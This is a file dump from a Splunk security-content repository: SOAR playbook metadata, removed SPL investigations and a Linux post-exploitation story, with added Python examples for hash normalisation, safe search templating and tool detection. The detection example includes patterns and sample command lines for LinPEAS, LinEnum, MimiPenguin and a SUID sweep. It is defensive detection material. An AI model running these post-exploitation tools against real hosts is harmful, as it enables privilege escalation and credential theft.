/playbooks/URL_Outbound_Traffic_Filtering_Dispatch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/URL_Outbound_Traffic_Filtering_Dispatch.png -------------------------------------------------------------------------------- /playbooks/UrlScan_IO_Dynamic_Analysis.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/UrlScan_IO_Dynamic_Analysis.png -------------------------------------------------------------------------------- /playbooks/VirusTotal_v3_Dynamic_Analysis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/VirusTotal_v3_Dynamic_Analysis.png -------------------------------------------------------------------------------- /playbooks/VirusTotal_v3_Identifier_Reputation_Analysis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/VirusTotal_v3_Identifier_Reputation_Analysis.png -------------------------------------------------------------------------------- /playbooks/Windows_Defender_ATP_Identifier_Activity_Analysis.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Windows_Defender_ATP_Identifier_Activity_Analysis.png -------------------------------------------------------------------------------- /playbooks/Zscaler_Outbound_Traffic_Filtering.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/Zscaler_Outbound_Traffic_Filtering.png -------------------------------------------------------------------------------- /playbooks/activedirectory_reset_password.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/activedirectory_reset_password.png -------------------------------------------------------------------------------- /playbooks/aws_disable_user_accounts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/aws_disable_user_accounts.png -------------------------------------------------------------------------------- /playbooks/aws_find_inactive_users.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/aws_find_inactive_users.png -------------------------------------------------------------------------------- /playbooks/block_indicators.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/block_indicators.png -------------------------------------------------------------------------------- /playbooks/crowdstrike_malware_triage.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/crowdstrike_malware_triage.png -------------------------------------------------------------------------------- /playbooks/custom_functions/noop.json: -------------------------------------------------------------------------------- 1 | { 2 | "create_time": "2021-04-28T19:53:21.159704+00:00", 3 | "custom_function_id": "561cadef222a920bb91c236c6e9eb7604f537369", 4 | "description": "Do nothing and return nothing. Use this if you want to do something in a custom function setup section or leave a placeholder block in a playbook. 
This does not sleep or wait and will return as soon as possible.", 5 | "draft_mode": false, 6 | "inputs": [], 7 | "outputs": [], 8 | "platform_version": "4.10.3.51237", 9 | "python_version": "3" 10 | } -------------------------------------------------------------------------------- /playbooks/custom_functions/noop.py: -------------------------------------------------------------------------------- 1 | def noop(**kwargs): 2 | """ 3 | Do nothing and return nothing. Use this if you want to do something in a custom function setup section or leave a placeholder block in a playbook. This does not sleep or wait and will return as soon as possible. 4 | 5 | Returns a JSON-serializable object that implements the configured data paths: 6 | 7 | """ 8 | ############################ Custom Code Goes Below This Line ################################# 9 | import json 10 | import phantom.rules as phantom 11 | 12 | outputs = {} 13 | 14 | # Return a JSON-serializable object 15 | assert json.dumps(outputs) # Will raise an exception if the :outputs: object is not JSON-serializable 16 | return outputs 17 | -------------------------------------------------------------------------------- /playbooks/delete_detected_files.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/delete_detected_files.png -------------------------------------------------------------------------------- /playbooks/email_notification_for_malware.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/email_notification_for_malware.png -------------------------------------------------------------------------------- /playbooks/hunting.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/hunting.png -------------------------------------------------------------------------------- /playbooks/internal_host_splunk_investigate_log4j.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/internal_host_splunk_investigate_log4j.png -------------------------------------------------------------------------------- /playbooks/internal_host_ssh_investigate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/internal_host_ssh_investigate.png -------------------------------------------------------------------------------- /playbooks/internal_host_ssh_log4j_investigate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/internal_host_ssh_log4j_investigate.png -------------------------------------------------------------------------------- /playbooks/internal_host_ssh_log4j_respond.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/internal_host_ssh_log4j_respond.png -------------------------------------------------------------------------------- /playbooks/internal_host_winrm_investigate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/internal_host_winrm_investigate.png -------------------------------------------------------------------------------- 
/playbooks/internal_host_winrm_log4j_investigate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/internal_host_winrm_log4j_investigate.png -------------------------------------------------------------------------------- /playbooks/internal_host_winrm_log4j_respond.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/internal_host_winrm_log4j_respond.png -------------------------------------------------------------------------------- /playbooks/log4j_investigate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/log4j_investigate.png -------------------------------------------------------------------------------- /playbooks/log4j_respond.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/log4j_respond.png -------------------------------------------------------------------------------- /playbooks/malware_hunt_and_contain.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/malware_hunt_and_contain.png -------------------------------------------------------------------------------- /playbooks/malware_hunt_and_contain.yml: -------------------------------------------------------------------------------- 1 | name: Malware Hunt and Contain 2 | id: fb3edc76-ff2b-43c0-5f6f-63da4483fd63 3 | version: 1 4 | date: '2021-01-21' 5 | author: Philip Royer, Splunk 6 | type: 
Response 7 | description: This playbook investigates and remediates malware infections on the endpoint. 8 | playbook: malware_hunt_and_contain 9 | how_to_implement: "Be sure to update asset naming to reflect the asset names configured in your environment." 10 | references: [] 11 | app_list: 12 | - "LDAP" 13 | - "ServiceNow" 14 | - "Carbon Black Response" 15 | - "VirusTotal" 16 | tags: 17 | platform_tags: [] 18 | playbook_type: Automation 19 | vpe_type: Classic 20 | playbook_fields: 21 | - fileHash 22 | product: 23 | - Splunk SOAR -------------------------------------------------------------------------------- /playbooks/ransomware_investigate_and_contain.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/ransomware_investigate_and_contain.png -------------------------------------------------------------------------------- /playbooks/risk_notable_block_indicators.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_block_indicators.png -------------------------------------------------------------------------------- /playbooks/risk_notable_enrich.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_enrich.png -------------------------------------------------------------------------------- /playbooks/risk_notable_import_data.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_import_data.png 
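The noop.py custom function above is the skeleton every Splunk SOAR custom function in this repo follows: take `**kwargs`, build a JSON-serializable `outputs` dict, prove it serializes, return it. The following is an added example, not code from the repo, of a custom function in that same shape that does real work: it validates and de-duplicates the `fileHash` values a playbook such as Malware Hunt and Contain would pass before they are sent to reputation or EDR blocks. The `phantom.rules` import in noop.py is deliberately omitted so the function runs outside SOAR; the sample hashes are constructed test values, and the function name and output keys are this example's own choices, not SOAR conventions.

```python
import json
import re

# Constructed sample input in the shape a playbook would pass for the
# "fileHash" playbook field: mixed case, a duplicate, junk, empty and None
# (SOAR hands over None when an artifact lacks the field).
SAMPLE_HASHES = [
    "44d88612fea8a8f36de82e1278abb02f",                                   # 32 hex -> md5
    "3395856CE81F2B7382DEE72602F798B642F14140",                           # 40 hex -> sha1
    "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",   # 64 hex -> sha256
    "44D88612FEA8A8F36DE82E1278ABB02F",                                   # duplicate of the md5
    "not-a-hash",
    "",
    None,
]

_HASH_TYPES = {32: "md5", 40: "sha1", 64: "sha256"}
_HEX_RE = re.compile(r"^[0-9a-f]+$")


def normalize_file_hashes(**kwargs):
    """
    Validate and de-duplicate file hashes before they reach downstream blocks.

    Same contract as noop.py: keyword inputs in, a JSON-serializable dict out.
    Accepts `fileHash` as a single string or a list; values that are not
    32/40/64 hex characters are reported in `rejected` rather than silently
    dropped, so a playbook can branch on them.
    """
    raw = kwargs.get("fileHash") or []
    if isinstance(raw, str):
        raw = [raw]

    accepted, rejected, seen = [], [], set()
    for value in raw:
        h = (value or "").strip().lower()          # None -> "" -> rejected below
        kind = _HASH_TYPES.get(len(h))
        if kind is None or not _HEX_RE.match(h):
            rejected.append(value)
            continue
        if h in seen:                              # case-insensitive de-dup
            continue
        seen.add(h)
        accepted.append({"hash": h, "type": kind})

    outputs = {
        "hashes": accepted,
        "rejected": rejected,
        "accepted_count": len(accepted),
    }

    # Same check noop.py performs: fail loudly if outputs cannot be serialized.
    assert json.dumps(outputs)
    return outputs


if __name__ == "__main__":
    print(json.dumps(normalize_file_hashes(fileHash=SAMPLE_HASHES), indent=2))
```

Keeping the rejected values in the output rather than raising matters in a playbook: a single malformed artifact should not abort containment for the hashes that were valid, and the rejected list gives the analyst something to look at.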
-------------------------------------------------------------------------------- /playbooks/risk_notable_investigate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_investigate.png -------------------------------------------------------------------------------- /playbooks/risk_notable_investigate.yml: -------------------------------------------------------------------------------- 1 | name: Risk Notable Investigate 2 | id: 030edc96-ff2b-48b0-9f6f-03da3783fd63 3 | version: 1 4 | date: "2021-10-22" 5 | author: Kelby Shelton, Splunk 6 | type: Investigation 7 | description: This playbook checks for the presence of the Risk Investigation workbook and updates tasks or leaves generic notes. 8 | playbook: risk_notable_investigate 9 | how_to_implement: For detailed implementation see https://docs.splunk.com/Documentation/ESSOC/latest/user/Useplaybookpack 10 | references: 11 | - https://docs.splunk.com/Documentation/ESSOC/latest/user/Useplaybookpack 12 | app_list: [] 13 | tags: 14 | labels: 15 | - risk_notable 16 | playbook_type: Automation 17 | vpe_type: Modern 18 | platform_tags: 19 | - Risk Notable 20 | product: 21 | - Splunk SOAR 22 | -------------------------------------------------------------------------------- /playbooks/risk_notable_merge_events.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_merge_events.png -------------------------------------------------------------------------------- /playbooks/risk_notable_mitigate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_mitigate.png 
-------------------------------------------------------------------------------- /playbooks/risk_notable_preprocess.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_preprocess.png -------------------------------------------------------------------------------- /playbooks/risk_notable_protect_assets_and_users.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_protect_assets_and_users.png -------------------------------------------------------------------------------- /playbooks/risk_notable_review_indicators.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_review_indicators.png -------------------------------------------------------------------------------- /playbooks/risk_notable_verdict.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/risk_notable_verdict.png -------------------------------------------------------------------------------- /playbooks/start_investigation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/start_investigation.png -------------------------------------------------------------------------------- /playbooks/threat_intel_investigate.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/threat_intel_investigate.png
--------------------------------------------------------------------------------
/playbooks/trustar_enrich_indicators.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/playbooks/trustar_enrich_indicators.png
--------------------------------------------------------------------------------
/removed/investigations/all_backup_logs_for_host.yml:
--------------------------------------------------------------------------------
name: All backup logs for host
id: bc91a8cf-aaaa-4bb2-8140-e756cc06fd72
version: 1
date: '2017-09-12'
author: Rico Valdez, Splunk
type: Investigation
status: removed
description: Retrieve the backup logs for the last 2 weeks for a specific host in order to investigate why backups are not completing successfully.
search: '| search `netbackup` dest=$dest$'
how_to_implement: To successfully implement this search you must first send your backup logs to Splunk.
known_false_positives: none
references: []
tags:
  analytic_story:
  - Monitor Backup Solution
  product:
  - Splunk Phantom
  security_domain: endpoint
--------------------------------------------------------------------------------
/removed/investigations/get_backup_logs_for_endpoint.yml:
--------------------------------------------------------------------------------
name: Get Backup Logs For Endpoint
id: fdcfb369-1725-4c24-824a-22972d7f0d44
version: 1
date: '2017-09-14'
author: David Dorsey, Splunk
type: Investigation
status: removed
description: This search will tell you the backup status from your netbackup_logs of a specific endpoint for the last week.
search: '`netbackup` COMPUTERNAME=$dest$ | rename COMPUTERNAME as dest, MESSAGE as signature | table _time, dest, signature'
how_to_implement: You must be ingesting your backup logs.
known_false_positives: ''
references: []
tags:
  analytic_story:
  - Ransomware
  - SamSam Ransomware
  product:
  - Splunk Phantom
  security_domain: endpoint
--------------------------------------------------------------------------------
/removed/investigations/investigate_network_traffic_from_src_ip.yml:
--------------------------------------------------------------------------------
name: Investigate Network Traffic From src ip
id: 9df9ca9c-a02b-4f48-9eba-0bac55179050
version: 1
date: '2018-06-15'
author: David Dorsey, Splunk
type: Investigation
status: removed
description: This search allows you to find all the network traffic from a specific IP address.
search: '| from datamodel Network_Traffic.All_Traffic | search src_ip=$src_ip$'
how_to_implement: To successfully implement this search, you must be ingesting your network traffic logs and populating the Network_Traffic data model, which is the data model the search reads from.
known_false_positives: ''
references: []
tags:
  analytic_story:
  - ColdRoot MacOS RAT
  product:
  - Splunk Phantom
  security_domain: network
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
contentctl==5.5.3
--------------------------------------------------------------------------------
/stories/deprecated/.gitkeep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/splunk/security_content/1b81186d5c18d21c7e6d9975926cf3f4da055ebf/stories/deprecated/.gitkeep
--------------------------------------------------------------------------------
/stories/linux_post_exploitation.yml:
--------------------------------------------------------------------------------
name: Linux Post-Exploitation
id: d310ccfe-5477-11ec-ad05-acde48001122
version: 1
date: '2021-12-03'
author: Rod Soto
status: production
description: This analytic story identifies popular Linux post-exploitation tools such as autoSUID, LinEnum, LinPEAS, Linux Exploit Suggesters and MimiPenguin.
narrative: These tools allow operators to find possible exploits or paths for privilege escalation based on SUID binaries, user permissions, kernel version and distro version.
references:
- https://attack.mitre.org/matrices/enterprise/linux/
tags:
  category:
  - Adversary Tactics
  product:
  - Splunk Enterprise
  - Splunk Enterprise Security
  - Splunk Cloud
  usecase: Security Monitoring
--------------------------------------------------------------------------------
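The removed investigations above are parameterised SPL: a playbook substitutes a value for `$dest$` or `$src_ip$` and runs the resulting search. The Python below is an added illustration, not code from splunk/security_content or contentctl. It reproduces the `Get Backup Logs For Endpoint` and `Investigate Network Traffic From src ip` searches over constructed events, and shows the token-substitution step with an allow-list on the substituted value so that a value pulled from an untrusted artifact cannot terminate the filter and append its own SPL. The event field layout, the seven-day window, the case-insensitive value match (Splunk's `search` command compares field values case-insensitively) and the allow-list pattern are assumptions of this example.

```python
import re
from datetime import datetime, timedelta

# --- token handling ---------------------------------------------------------
TOKEN_RE = re.compile(r"\$(\w+)\$")
# Allow-list for substituted values: hostnames, FQDNs, IPv4/IPv6 literals.
# Assumption of this example, chosen to fit the dest / src_ip tokens above.
SAFE_VALUE_RE = re.compile(r"^[A-Za-z0-9._:-]{1,253}$")


def is_safe_token_value(value) -> bool:
    """True if the value can be interpolated into SPL without adding syntax."""
    return bool(SAFE_VALUE_RE.match(str(value)))


def render_search(search: str, tokens: dict) -> str:
    """Fill $name$ placeholders in an investigation's search string.

    Spaces, quotes and pipes are refused, so a value taken from an untrusted
    artifact cannot close the filter term and append its own SPL commands.
    """
    def repl(match):
        name = match.group(1)
        if name not in tokens:
            raise KeyError(f"no value supplied for ${name}$")
        value = str(tokens[name])
        if not is_safe_token_value(value):
            raise ValueError(f"refusing unsafe value for ${name}$: {value!r}")
        return value
    return TOKEN_RE.sub(repl, search)


# The search strings exactly as they appear in the removed investigations.
GET_BACKUP_LOGS_SEARCH = (
    "`netbackup` COMPUTERNAME=$dest$ | rename COMPUTERNAME as dest, MESSAGE as "
    "signature | table _time, dest, signature"
)
NETWORK_FROM_SRC_IP_SEARCH = (
    "| from datamodel Network_Traffic.All_Traffic | search src_ip=$src_ip$"
)

# --- constructed sample events (not real log data) --------------------------
SAMPLE_NOW = datetime(2017, 9, 14, 12, 0, 0)
NETBACKUP_EVENTS = [
    {"_time": "2017-09-01T02:00:00", "COMPUTERNAME": "WS-ACCT-01", "MESSAGE": "Backup completed successfully"},  # older than a week
    {"_time": "2017-09-13T02:00:00", "COMPUTERNAME": "WS-ACCT-01", "MESSAGE": "Backup completed successfully"},
    {"_time": "2017-09-14T02:00:00", "COMPUTERNAME": "ws-acct-01", "MESSAGE": "Backup failed: media write error"},
    {"_time": "2017-09-14T02:00:00", "COMPUTERNAME": "WS-HR-02", "MESSAGE": "Backup completed successfully"},
]
NETWORK_EVENTS = [
    {"_time": "2018-06-15T10:00:00", "src_ip": "10.0.0.5", "dest_ip": "203.0.113.7", "dest_port": 443, "bytes_out": 5120},
    {"_time": "2018-06-15T10:00:05", "src_ip": "10.0.0.9", "dest_ip": "10.0.0.1", "dest_port": 53, "bytes_out": 80},
    {"_time": "2018-06-15T10:01:00", "src_ip": "10.0.0.5", "dest_ip": "198.51.100.23", "dest_port": 8080, "bytes_out": 2048},
]


def get_backup_logs_for_endpoint(events, dest, now, days=7):
    """Python equivalent of GET_BACKUP_LOGS_SEARCH over a 'last week' window.

    The COMPUTERNAME comparison is case-insensitive, as in Splunk's search
    command; rename keeps the original field value, table keeps three fields.
    """
    cutoff = now - timedelta(days=days)
    rows = []
    for event in events:
        if event["COMPUTERNAME"].casefold() != dest.casefold():
            continue
        if datetime.fromisoformat(event["_time"]) < cutoff:
            continue
        rows.append({"_time": event["_time"],
                     "dest": event["COMPUTERNAME"],
                     "signature": event["MESSAGE"]})
    return rows


def investigate_network_traffic_from_src_ip(events, src_ip):
    """Python equivalent of NETWORK_FROM_SRC_IP_SEARCH over All_Traffic rows."""
    return [e for e in events if e["src_ip"].casefold() == src_ip.casefold()]


if __name__ == "__main__":
    print(render_search(GET_BACKUP_LOGS_SEARCH, {"dest": "WS-ACCT-01"}))
    for row in get_backup_logs_for_endpoint(NETBACKUP_EVENTS, "WS-ACCT-01", SAMPLE_NOW):
        print(row)
    print(render_search(NETWORK_FROM_SRC_IP_SEARCH, {"src_ip": "10.0.0.5"}))
    for row in investigate_network_traffic_from_src_ip(NETWORK_EVENTS, "10.0.0.5"):
        print(row)
```

The allow-list is deliberately narrow: anything that is not a plausible host or address is rejected outright rather than escaped, because the tokens in these searches only ever carry a hostname or an IP.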
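The Linux Post-Exploitation story names the tools it covers but not how they surface in telemetry. The Python below is an added example, not the detection content that ships with the story: it scans constructed Linux process-execution events for the tool names listed in the story and, where no name matches, falls back to the SUID sweep (`find ... -perm -4000`) that these enumeration scripts run, which still catches a copy the operator has renamed. The event format, the hostnames and users, the regex patterns and the fallback heuristic are all assumptions of this example.

```python
import re

# Tool-name patterns matched against the lowercased command line. Derived from
# the names in the story; the exact patterns are an assumption of this example.
TOOL_PATTERNS = {
    "autoSUID": re.compile(r"autosuid"),
    "LinEnum": re.compile(r"linenum"),
    "LinPEAS": re.compile(r"linpeas"),
    "Linux Exploit Suggester": re.compile(r"linux[-_]?exploit[-_]?suggester|\bles\.sh\b"),
    "MimiPenguin": re.compile(r"mimipenguin"),
}

# Behavioural fallback for renamed copies: these scripts enumerate SUID binaries
# with find(1), so the sweep itself is flagged when no tool name matched.
SUID_SWEEP_RE = re.compile(r"\bfind\b.*-perm\s+[-/]?[0-7]*4000")

# Constructed process-execution events (hypothetical hosts/users, not real telemetry).
EVENTS = [
    {"host": "web01", "user": "www-data", "cmdline": "bash ./linpeas.sh -a"},
    {"host": "web01", "user": "www-data", "cmdline": "python3 /tmp/mimipenguin.py"},
    {"host": "db02", "user": "postgres", "cmdline": "sh /dev/shm/LinEnum.sh -t"},
    {"host": "db02", "user": "postgres", "cmdline": "perl linux-exploit-suggester-2.pl -k 4.4.0"},
    {"host": "build03", "user": "jenkins", "cmdline": "bash AutoSUID.sh"},
    {"host": "build03", "user": "jenkins", "cmdline": "bash ./update.sh"},  # renamed tool: no name hit
    {"host": "build03", "user": "jenkins", "cmdline": "find / -perm -4000 -type f 2>/dev/null"},
    {"host": "web01", "user": "root", "cmdline": "ls -la /tmp"},
]


def classify(cmdline: str) -> list:
    """Return the tool labels a single command line matches (empty if none)."""
    lowered = cmdline.lower()
    hits = [name for name, pattern in TOOL_PATTERNS.items() if pattern.search(lowered)]
    if not hits and SUID_SWEEP_RE.search(lowered):
        hits.append("SUID enumeration (tool not named)")
    return hits


def scan(events) -> list:
    """Run classify() over events and return one finding per (event, tool)."""
    findings = []
    for event in events:
        for tool in classify(event["cmdline"]):
            findings.append({"host": event["host"], "user": event["user"],
                             "tool": tool, "cmdline": event["cmdline"]})
    return findings


def hosts_by_tool(findings) -> dict:
    """Pivot findings into {tool: sorted hosts}, the view an analyst triages from."""
    pivot = {}
    for finding in findings:
        pivot.setdefault(finding["tool"], set()).add(finding["host"])
    return {tool: sorted(hosts) for tool, hosts in pivot.items()}


if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(f"{finding['host']:8} {finding['user']:10} {finding['tool']:34} {finding['cmdline']}")
```

Name matching alone misses the renamed `update.sh` on build03; the SUID sweep it performs a moment later is what surfaces it, which is why a story built around these tools should pair name-based detections with the behaviours the tools share.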